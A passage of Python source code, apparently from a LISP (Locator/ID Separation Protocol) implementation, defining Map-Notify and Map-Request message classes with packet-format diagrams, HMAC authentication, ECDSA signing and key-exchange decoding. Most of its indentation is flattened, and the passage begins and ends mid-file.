packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
#
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
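#
# Illustrative sketch (not called anywhere): the authentication pattern
# used by lisp_map_register.encode() and lisp_map_notify.encode() above.
# The auth-data field is first zeroed, a keyed hash is run over the
# entire message, and the digest is then spliced into the auth-data
# field. Plain hmac-sha1 is shown here as an assumption; the real code
# computes the digest via lisp_hash_me() with the configured alg-id.
#
def lisp_example_auth_splice(packet, offset, auth_len, password):
import hmac, hashlib
zeroed = packet[0:offset] + ("\x00" * auth_len) + \
packet[offset + auth_len::]
digest = hmac.new(password, zeroed, hashlib.sha1).digest()
digest = digest[0:auth_len]
return(zeroed[0:offset] + digest + zeroed[offset + auth_len::])
#enddef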
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# Then use ecdsa.VerifyingKey.from_pem() after reading in the file.
#
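# Note the python-ecdsa module used below only accepts EC keys, so for the
# sign/verify sketch here an EC key-pair would be needed, for example
# (filenames illustrative):
#
#   openssl ecparam -name prime256v1 -genkey -noout -out privkey.pem
#   openssl ec -pubout -in privkey.pem -out pubkey.pem
#
# and then in python:
#
#   import ecdsa
#   privkey = ecdsa.SigningKey.from_pem(open("privkey.pem").read())
#   pubkey = ecdsa.VerifyingKey.from_pem(open("pubkey.pem").read())
#   sig = privkey.sign("data-to-sign")
#   assert pubkey.verify(sig, "data-to-sign")
#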
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
self.json_telemetry = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
if (itr.afi == LISP_AFI_LCAF and self.json_telemetry != None):
continue
#endif
itr_str = red(itr.print_address_no_iid(), False)
lprint(" itr-rloc: afi {} {}{}".format(itr.afi, itr_str,
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
if (self.json_telemetry != None):
lprint(" itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
self.json_telemetry))
#endif
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode_json(self, json_string):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 2)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0, lcaf_len,
json_len)
packet += json_string
packet += struct.pack("H", 0)
return(packet)
#enddef
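    #
    # Worked example of the encoding above: for a 100-byte JSON string,
    # json_len is 100 and lcaf_len is 102, the extra 2 bytes covering the
    # trailing AFI = 0. lcaf_decode_json() below relies on exactly this
    # relationship when it checks lcaf_len against json_len + 2.
    #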
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
telemetry = lisp_telemetry_configured() if (self.rloc_probe) else None
if (telemetry != None): self.itr_rloc_count += 1
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
packet += self.encode_json(json_string)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
#
# Add telemetry, if configured and this is an RLOC-probe Map-Request.
#
if (telemetry != None):
ts = str(time.time())
telemetry = lisp_encode_telemetry(telemetry, io=ts)
self.json_telemetry = telemetry
packet += self.encode_json(telemetry)
#endif
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
json_string = packet[0:json_len]
packet = packet[json_len::]
#
        # If there is telemetry data in the JSON, there is no need to convert
        # it to a dictionary.
#
if (lisp_is_json_telemetry(json_string) != None):
self.json_telemetry = json_string
#endif
#
        # Get the AFI that follows the JSON string; we are expecting an AFI
        # of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
if (self.json_telemetry != None): return(packet)
#
        # Convert the JSON string to a dictionary.
#
try:
json_string = json.loads(json_string)
except:
return(None)
#endtry
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f)
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
itr_rloc_count = self.itr_rloc_count + 1
while (itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = socket.ntohs(struct.unpack("H", packet[:format_size])[0])
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = afi
#
# We may have telemetry in the ITR-RLOCs. Check here to avoid
# security key material logic.
#
if (itr.afi == LISP_AFI_LCAF):
orig_packet = packet
json_packet = packet[format_size::]
packet = self.lcaf_decode_json(json_packet)
if (packet == json_packet): packet = orig_packet
#endif
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
                # Decide if we should remove security key state because the
                # ITR stopped doing key exchange after previously doing so.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
elif (self.json_telemetry == None):
#
# Decode key material if we found no telemetry data.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
        else:
            packet = self.target_eid.unpack_address(packet)
            if (packet == None): return(None)
        #endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
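#
# Worked example for the xTR-ID encoding in lisp_map_request above, assuming
# byte_swap_64() reverses the byte order of a 64-bit value: the 128-bit
# xtr_id is split into two 64-bit halves, each half is byte-swapped, and the
# halves are packed upper-half first. decode_xtr_id() undoes this by
# swapping each half again and recombining:
#
#   xtr_id = (byte_swap_64(upper) << 64) | byte_swap_64(lower)
#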
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
